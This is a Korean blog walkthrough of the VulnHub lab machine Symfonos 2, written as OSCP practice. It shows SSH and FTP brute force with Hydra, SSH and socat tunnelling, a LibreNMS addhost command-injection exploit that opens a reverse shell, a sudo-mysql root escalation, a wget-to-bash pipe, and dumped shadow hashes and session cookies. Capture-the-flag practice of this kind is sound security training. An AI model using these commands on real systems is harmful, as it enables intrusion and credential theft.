INFO
Name : Symfonos 2
Difficulty : Intermediate
Type : boot2root Source
VulnHub URL : https://www.vulnhub.com/entry/symfonos-2,331/
Entry : 8 / 35
Welcome to the walkthrough for Symfonos: 2, a boot2root CTF found on VulnHub. This is the eleventh VM in my VulnHub Challenge, and the first in the “intermediate” category! These intermediate machines are more challenging than beginner machines and should represent a similar challenge to those found in the OSCP labs. The Symfonos family of virtual machines are more recent entries, with Symfonos: 2 being released on July 18, 2019.
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the Symfonos: 2 image, with both VMs running in a NAT network(sometimes Bridged). The previous version of Symfonos used VirtualBox, I tried to use it with Workstation this time.
0. DISCOVERY
: netdiscover
1. SCANNING
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 12:42 KST
Nmap scan report for 192.168.20.8
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http WebFS httpd 1.21
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2.WEB ENUMERATION & RECONNAISSANCE
by nikto / dirb / wfuzz /curl
: no results
3. SMB RECONNAISSANCE
┌──(root💀takudaddy)-[/attack]
└─# smbclient -L //192.168.20.8
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
enum4linux :
=========================================
| Share Enumeration on 192.168.20.8 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.20.8
//192.168.20.8/print$ Mapping: DENIED, Listing: N/A
//192.168.20.8/anonymous Mapping: OK, Listing: OK
//192.168.20.8/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
/anonymous 로그인 가능
smbclient로 접속해 정보 수집
──(root💀takudaddy)-[/attack]
└─# smbclient //192.168.20.8/anonymous 2 ⚙
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 23:30:09 2019
.. D 0 Thu Jul 18 23:29:08 2019
backups D 0 Thu Jul 18 23:25:17 2019
19728000 blocks of size 1024. 16313724 blocks available
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> ls
. D 0 Thu Jul 18 23:30:09 2019
.. D 0 Thu Jul 18 23:29:08 2019
backups D 0 Thu Jul 18 23:25:17 2019
19728000 blocks of size 1024. 16313720 blocks available
smb: \> cd backups
smb: \backups\> ls
. D 0 Thu Jul 18 23:25:17 2019
.. D 0 Thu Jul 18 23:30:09 2019
log.txt N 11394 Thu Jul 18 23:25:16 2019
19728000 blocks of size 1024. 16313720 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (11125.9 KiloBytes/sec) (average 11127.0 KiloBytes/sec)
smb: \backups\> quit
파일 내용 = SMB config + proftp.conf 파일
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
건너 뜀
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
# Don't use IPv6 support by default.
UseIPv6 off
# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask 022
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances 30
# Set the user and group under which the server will run.
User aeolus
Group aeolus
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
DenyAll
</Limit>
# A basic anonymous configuration, no upload directories. If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
중요 정보
: cat /etc/shadow > /var/backups/shadow.bak (나중에 침투 후 써먹을 수 있다)
: smb share point = /home/aeolus/share
: user&group = aeolus
: ftp 로그인 = anonymous 혹은 ftp > 안 됨!
4. SSH(FTP) BRUTE FORCE
password brute force
aeolus 아이디로 비번 찾아본다.
──(root💀takudaddy)-[/attack]
└─# hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ssh://192.168.20.8 -t 1 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-27 16:43:42
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking ssh://192.168.20.8:22/
[STATUS] 7.00 tries/min, 7 tries in 00:01h, 14344392 to do in 34153:19h, 1 active
[STATUS] 6.67 tries/min, 20 tries in 00:03h, 14344382 to do in 35860:58h, 1 active
[STATUS] 24.43 tries/min, 171 tries in 00:07h, 14344231 to do in 9786:31h, 1 active
[STATUS] 31.33 tries/min, 470 tries in 00:15h, 14343932 to do in 7629:46h, 1 active
[STATUS] 35.16 tries/min, 1090 tries in 00:31h, 14343312 to do in 6798:50h, 1 active
[STATUS] 17.64 tries/min, 1266 tries in 01:11h, 14343136 to do in 13554:29h, 1 active
[STATUS] 21.45 tries/min, 1883 tries in 01:27h, 14342519 to do in 11143:53h, 1 active
[STATUS] 23.92 tries/min, 2482 tries in 01:43h, 14341920 to do in 9994:59h, 1 active
[STATUS] 23.31 tries/min, 2810 tries in 02:00h, 14341592 to do in 10252:55h, 1 active
[STATUS] 25.06 tries/min, 3421 tries in 02:16h, 14340981 to do in 9539:14h, 1 active
뭔가 이상하다.
보통 10분~ 15분 정도면 크랙 되는데
2시간이 넘어가도 3천여번 밖에 시도를 못했다니?
시험때 이러면 큰일이다.
마냥 기다릴 수가 없으니
이런 경우를 대비해
대비책을 세워야 한다.
몇 가지 실험을 해봤다.
우선 ssh가 아닌 ftp에
brute force를 해봤더니
15분 안으로 크랙이 되었다.
또 서버의 네트워크 방식을
브릿지드 방식으로 바꾸고
ssh와 ftp 모두 brute force를
해보았는데 역시 ssh는 안되고
ftp는 10분 내로 되었다.
┌──(root💀takudaddy)-[/attack]
└─# hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 172.14.4.3 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-27 22:46:23
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://172.14.4.3:21/
[STATUS] 2849.00 tries/min, 2849 tries in 00:01h, 14341550 to do in 83:54h, 16 active
[STATUS] 2901.33 tries/min, 8704 tries in 00:03h, 14335695 to do in 82:22h, 16 active
[STATUS] 2907.00 tries/min, 20349 tries in 00:07h, 14324050 to do in 82:08h, 16 active
[21][ftp] host: 172.14.4.3 login: aeolus password: sergioteamo
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-27 22:55:13
서버 자체의 문제인지
ssh 접속이 불안정하며
[STATUS] 59.53 tries/min, 893 tries in 00:15h, 14343539 to do in 4015:33h, 16 active
[ERROR] ssh target does not support password auth
위와 같은 애러가 중간중간 나오는데
결론 짓기론 시스템 문제.
의도한 바인지는 모르겠으나
이런 사소한 기술적 문제들은
집중력을 저하 시키고
의욕을 상실하게 하며
불필요한 에너지를 소모하게 만든다.
오늘 박스 3개 풀 생각이었는데
이러다 하나도 못 끝낼 듯..
버린 시간들 생각하면 극노지만
시험에서도 얼마든 일어날 수 있는 일에 대한
대비책을 미리 세운거라 생각하며 위안해 본다.
암튼 계속 진행해 본자
aeolus : sergioteamo
5. SSH LOGIN
┌──(root💀takudaddy)-[~]
└─# ssh aeolus@192.168.20.8
ssh: connect to host 192.168.20.8 port 22: Connection refused
┌──(root💀takudaddy)-[~]
└─# ssh aeolus@192.168.20.8
ssh: connect to host 192.168.20.8 port 22: Connection refused
┌──(root💀takudaddy)-[~]
└─# ssh aeolus@192.168.20.8
aeolus@192.168.20.8's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 27 09:53:23 2021 from 192.168.20.1
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
aeolus@symfonos2:~$ who
하..
의도한 바가 아니라
시스템 문제가 확실하다.
접속도 여러번 시도해야 되고
접속 후 곧바로 서버가 다운된다..
개짜증.. 이러니 크랙을 못하지
aeolus@symfonos2:~$ sudo -l
[sudo] password for aeolus: Sorry, user aeolus may not run sudo on symfonos2. aeolus@symfonos2:~$ sudo /bin/bash
[sudo] password for aeolus: aeolus is not in the sudoers file. This incident will be reported.
ftp로 접속해서 작업하다
제한이 많아서 결국
서버로 바로 접속해 작업한다.
6. EXPLOITATION
접속 후 기본 작업 :
로컬 포트 확인, 스캐닝 툴 복사해 돌리기
3306 / 5355 /8080 이 추가로 발견됨
llmnr은 뭐지?
# wget http://192.168.20.1/linuxEnum.sh
# wget -qO - http://192.168.20.1/linuxEnum.sh | bash
그리고 위에서 찾은 shadow 파일 복사한 파일 검색
: cat /etc/shadow > /var/backups/shadow.bak
명령어 복사 하기가
어려워 다시 ssh로 접속해
작업을 시도한다. (다행히 갑자기? 잘 됨)
┌──(root💀takudaddy)-[/attack]
└─# ssh aeolus@192.168.20.8 130 ⨯ 2 ⚙
aeolus@192.168.20.8's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sat Mar 27 10:13:36 2021
aeolus@symfonos2:~$ cat /var/backups/shadow.bak
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
daemon:*:18095:0:99999:7:::
bin:*:18095:0:99999:7:::
sys:*:18095:0:99999:7:::
sync:*:18095:0:99999:7:::
games:*:18095:0:99999:7:::
man:*:18095:0:99999:7:::
lp:*:18095:0:99999:7:::
mail:*:18095:0:99999:7:::
news:*:18095:0:99999:7:::
uucp:*:18095:0:99999:7:::
proxy:*:18095:0:99999:7:::
www-data:*:18095:0:99999:7:::
backup:*:18095:0:99999:7:::
list:*:18095:0:99999:7:::
irc:*:18095:0:99999:7:::
gnats:*:18095:0:99999:7:::
nobody:*:18095:0:99999:7:::
systemd-timesync:*:18095:0:99999:7:::
systemd-network:*:18095:0:99999:7:::
systemd-resolve:*:18095:0:99999:7:::
systemd-bus-proxy:*:18095:0:99999:7:::
_apt:*:18095:0:99999:7:::
Debian-exim:!:18095:0:99999:7:::
messagebus:*:18095:0:99999:7:::
sshd:*:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
mysql:!:18095:0:99999:7:::
Debian-snmp:!:18095:0:99999:7:::
librenms:!:18095::::::
작업 금방 끝날 것 같다.
해당 파일 /tmp로 복사해
내용을 수정한 뒤 다시 올려주면 끝?
aeolus@symfonos2:~$ cp /var/backups/shadow.bak /tmp
aeolus@symfonos2:~$ cd /tmp
aeolus@symfonos2:/tmp$ ls
linuxEnum.sh
linuxEnum.sh.1
shadow.bak
systemd-private-386ab85465e64535828c54cc663333db-apache2.service-k2v9i1
systemd-private-386ab85465e64535828c54cc663333db-systemd-resolved.service-e1WJEo
systemd-private-386ab85465e64535828c54cc663333db-systemd-timesyncd.service-gkPtEp
aeolus@symfonos2:/tmp$ ls -al shadow.bak
-rw-r--r-- 1 aeolus aeolus 1173 Mar 27 10:36 shadow.bak
aeolus@symfonos2:/tmp$
노노~
권한이 없어 안되는 것!
새로 발견된 포트가 키인 듯 하다.
3306/tcp open mysql MySQL 5.5.5-10.1.38-MariaDB-0+deb9u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.38-MariaDB-0+deb9u1
| Thread ID: 14
| Capabilities flags: 63487
| Some Capabilities: IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolNew, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, ConnectWithDatabase, LongPassword, SupportsCompression, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: 9(Zl2R'j`%3p^ggRD=E#
|_ Auth Plugin Name: 103
8080/tcp open http Apache httpd 2.4.25 ((Debian))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://localhost/login
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
7. SSH TUNNELS : LOCAL PORT FORWARDING to 8080
로컬 서버에서만 운영 되는 포트기 때문에
우리 쪽에서 접속을 시도해도
접속이 불가능 하다.
이런 경우 사용되는 방법 중 하나가
'터널링'이라는 방법이라는데
SSH로 우리쪽 특정 포트를
침투 서버의 특정 포트로
포워딩 시키면 된다.
-L (address 옵션)을 주고
우리포트:상대IP:대상포트
형식으로 쓰면 된단다.
┌──(root💀takudaddy)-[/attack]
└─# ssh -L 7979:127.0.0.1:8080 aeolus@192.168.20.8 1 ⚙
aeolus@192.168.20.8's password:
bind [127.0.0.1]:8080: Address already in use
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sat Mar 27 10:35:23 2021 from 192.168.20.1
aeolus@symfonos2:~$
연결에 성공했다.
우리쪽에서 localhost(127.0.0.1):7979 지정하면
상대편 로컬 호스트의 8080 포트로
포워딩, 넘겨지게 되는 것.
해본다.
LibreNMS의 로그인 페이지
┌──(root💀takudaddy)-[/attack]
└─# curl -v http://localhost:8080 1 ⚙
* Trying ::1:8080...
* Connected to localhost (::1) port 8080 (#0)
> GET / HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Sat, 27 Mar 2021 16:13:59 GMT
< Server: Apache/2.4.25 (Debian)
< Cache-Control: no-cache, private
< Location: http://localhost:8080/login
< Set-Cookie: XSRF-TOKEN=eyJpdiI6InlyXC9SOXNOb3FZVmZlQjBcL1FVN0dDdz09IiwidmFsdWUiOiJiTFAwZDdOeUFKZmNReWRBNnJmQzY4eEhZeVN0b3ROSDVYY1ZDbnVqckh1K3B4dTNTWFhVbzU4NUx2N2dub1hiV1B3YWRHVVRVRzdFOXZrS1NHRU1sZz09IiwibWFjIjoiMDlhZGVmNzgyZThlMWNiN2NmNTU2MDE3NzIzMzM4YzlmYTQzYzk0OWU3NDA1YzI4ZDg0YWE3MDM5NTc5Y2Y0YiJ9; expires=Sat, 27-Mar-2021 18:13:59 GMT; Max-Age=7200; path=/
< Set-Cookie: librenms_session=eyJpdiI6IkRseTQzZ25cLzZ6UWdSbnRvVVNCWTN3PT0iLCJ2YWx1ZSI6ImltamdsYmdFNWVhWlh4YTdJWWVYbERZdUZHQmQ3NmkyQ0ZNR3V3UkwzbStManZqZm1KSEZJSXdhU0dBeitxN3ZKQUpVU3BWT0M4TFNGc0VSQXhYQ25nPT0iLCJtYWMiOiJkZDQ5MzBiMzViN2E0N2YyZWRiMjYyZTZhNTZlZmMxOTcyMDFiZWFmZjM5NTg3NTViNDk0MGRlNjYyNTVkYzJiIn0%3D; expires=Sat, 27-Mar-2021 18:13:59 GMT; Max-Age=7200; path=/; httponly
< Content-Length: 352
< Content-Type: text/html; charset=UTF-8
<
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url=http://localhost:8080/login" />
<title>Redirecting to http://localhost:8080/login</title>
</head>
<body>
Redirecting to <a href="http://localhost:8080/login">http://localhost:8080/login</a>.
</body>
* Connection #0 to host localhost left intact
</html>
이 방법 말고
socat이라는 프로그램을 사용해
터널링을 할 수도 있는데
상대편 침투 서버에서
aeolus@symfonos2:~$ socat TCP-LISTEN:7979,fork TCP:127.0.0.1:8080
위 명령어를 입력.
7979 포트로 접근하는 TCP 통신들을
127.0.0.1:8080 포트로 리다이렉트
시켜주는 원리.
우리쪽 브라우저에서는
상대편 IP에 7979포트로
붙어주면 된다.
성공!
aeolus : sergioteamo로 로그인 시도
성공!
Edit Dashboard를 눌러 보란다.
세팅에 들어가보니
사용자 생성이 가능.
별 의미는 없다.
payload 검색
┌──(root💀takudaddy)-[/attack]
└─# searchsploit librenms 1 ⚙
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
LibreNMS - addhost Command Injection (Metasploit) | linux/remote/46970.rb
LibreNMS - Collectd Command Injection (Metasploit) | linux/remote/47375.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution | php/webapps/47044.py
LibreNMS 1.46 - 'search' SQL Injection | multiple/webapps/48453.txt
LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection | multiple/webapps/49246.py
가운데 파이썬 코드 addhost 를 받아본다.
┌──(root💀takudaddy)-[/attack]
└─# searchsploit -m php/webapps/47044.py 1 ⚙
Exploit: LibreNMS 1.46 - 'addhost' Remote Code Execution
URL: https://www.exploit-db.com/exploits/47044
Path: /usr/share/exploitdb/exploits/php/webapps/47044.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /attack/47044.py
┌──(root💀takudaddy)-[/attack]
└─# vi 47044.py 1 ⚙
┌──(root💀takudaddy)-[/attack]
└─# chmod +x *.py
사용법 확인
┌──(root💀takudaddy)-[/attack]
└─# python attack.py 1 ⚙
[!] Usage : ./exploit.py http://www.example.com cookies rhost rport
cookie 값이 필요하다.
개발자 도구를 열어 확인 가능하다.
F12 > Storage > Cookies
3개 다 모조리 긁어와야 함.
librenms_session=eyJpdiI6InU2TjU3WGtkamNySTFlazRjcWgxQkE9PSIsInZhbHVlIjoiK2NmVXhXTGRNdTR3b2dXNXJsNHord0hLcXBVSGMxcDhDV0tocDFcL0ZlREdVS0RBRFNmeVBac2hUMFhxYlduRVZLemhwek1GTWxtXC9TY011ckZ5d1BcL3c9PSIsIm1hYyI6IjZiZDJlNjM2ZTJjMmI0OGMwMjRjZGY2MmU2NzMyMjljMDJjY2MxMzMwOTg0NWVjZGNmZmI2MmQ1ZmU2NDcyNGEifQ%3D%3D ;
PHPSESSID=1dnetm4v9rt8gpm866b715qd21;
XSRF-TOKEN=eyJpdiI6InRDRHRJdWdQZkVCYzZPbENLZmpKK3c9PSIsInZhbHVlIjoiUDdPa1lQSEVNXC92dzNmVHZXOFh2Q3RXek04bGpiamh5SjlWQzVkTHJDVjlNUGdPYjA1Q1R6VkZcL2JrRG5oZkpMSW5kbjNiZ0ZcL1pqMlNBeDFBaVVJN0E9PSIsIm1hYyI6ImZmZDRmMTZhNjgyMTQ0NDk0NjI2NDJlZmU2NTM5ZmQ3ZDE1YThmY2YwZTRiNzZjOTQwMGI4Zjg3OTdlMDkxZDYifQ%3D%3D"
프로그램을 돌리면 받을 곳이 필요하기 때문에
터미널을 하나 새로 띄워 리스너를 기동시킨다.
┌──(root💀takudaddy)-[~]
└─# nc -lvp 8989
listening on [any] 8989 ...
그리고 프로그램 실행!
┌──(root💀takudaddy)-[/attack]
└─# python attack.py http://127.0.0.1:7979 "librenms_session=eyJpdiI6IitXczNjZ3FVTjZWR1VzV3hxMUdISWc9PSIsInZhbHVlIjoieFlFUmVVdEg3bUE2cDVJdGlsQ2Q3OWNqMFkraFhacVNseXBZSE9VXC9FcjJVSDVNYTRSbEpOZkVRZFR1Y0J5YTRxcllSVHlRMndldHNncHdTZnlvSyt3PT0iLCJtYWMiOiI5ZjExZTViNzM0MWIzMzMxOTRhNGIzNTMxODhkOTM1MmI4NjhlNzI3MWRjOWUxNDMwNzZiYWVhOThmZWM5NzFiIn0%3D\
;PHPSESSID=g96megcdhon6gvmem27g50pjk7;XSRF-TOKEN=eyJpdiI6ImgxTFFJVDRPOXptdnc5dGVmZkhBdWc9PSIsInZhbHVlIjoiQjlDbVFqdUQxZ0lvZUwzKzYwRHRIRzRnbUU2cVh0MThDXC8xUFdhNGNJQVwvbkZmT05iWktCTFl6UUE1MHhkdGVZMHdacWRWalJyY3ZCcmpXMW5EaDNcL2c9PSIsIm1hYyI6IjY2ODQ4NmU5ZDFjNzNiNTgxMWFjYzZkYmY5YTFmNTE2YTUyYzUyMDk3ZTIwMTliMzYyMDVhYzAwNjljZDBmODEifQ%3D%3D"
192.168.10.10 8989
[+] Device Created Sucssfully
접속 성공!
┌──(root💀takudaddy)-[~]
└─# nc -lvp 8989
listening on [any] 8989 ...
192.168.10.21: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.21] 44414
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
$ python -c 'import pty;pty.spawn("/bin/bash")'
cronus 유저로 접속했다.
8. Privilege Escalation
cronus@symfonos2:/$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
mysql 실행이 가능하다.
일단 접속!
cronus@symfonos2:/$ sudo /usr/bin/mysql (sduo mysql)
sudo /usr/bin/mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| librenms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)
별 내용은 없다.
mysql 접속한 상태에서 bash shell 실행
MariaDB [(none)]> \! whoami
\! whoami
root
MariaDB [(none)]> \! /bin/bash (-i 옵션 넣어도 됨)
\! /bin/bash
root@symfonos2:/opt/librenms/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos2:/opt/librenms/html#
아니면 mysql 접속 안하고 바로 실행
cronus@symfonos2:/$ sudo /usr/bin/mysql -e "\! /bin/bash" (sudo mysql -e '\! /bin/bash')
sudo mysql -e "\! /bin/bash"
root@symfonos2:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos2:/# cd /root
cd /root
root@symfonos2:~# ls
ls
proof.txt
root@symfonos2:~# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback!
끝
10. 추가 실습
msfconsole로 접근해보기
아래 과정은 위와 동일하게
ssh로 터널을 생성시킨 후에
시도해야 한다.
┌──(root💀takudaddy)-[/attack]
└─# msfconsole -q
msf6 > use exploit/linux/http/librenms_addhost_cmd_inject
[*] Using configured payload cmd/unix/reverse
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set RPORT 7979 (터널에서 오픈시킨 포트)
RPORT => 7979
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set username aeolus
username => aeolus
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set PASSWORD sergioteamo
PASSWORD => sergioteamo
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set LHOST 192.168.10.10
LHOST => 192.168.10.10
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > set LPORT 7979 (암거나 상관없음)
LPORT => 4444
msf6 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
[*] Started reverse TCP double handler on 192.168.10.10:4444
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname XsGlIoWJ
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname XsGlIoWJ and id #2
[*] Command: echo EGjDLGUtDAekMIlA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "EGjDLGUtDAekMIlA\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.10.10:4444 -> 192.168.10.21:44920) at 2021-03-28 17:51:16 +0900
id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
python -c 'import pty;pty.spawn("/bin/bash")'
cronus@symfonos2:/opt/librenms/html$
cronus@symfonos2:/opt/librenms/html$ sudo mysql
sudo mysql
MariaDB [(none)]> \! whoami
\! whoami
root
MariaDB [(none)]> \! /bin/bash
\! /bin/bash
root@symfonos2:/opt/librenms/html# id
id
uid=0(root) gid=0(root) groups=0(root)
끝
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 10. Symfonos 5 (0) | 2021.03.29 |
|---|---|
| 9. Symfonos 3 (0) | 2021.03.28 |
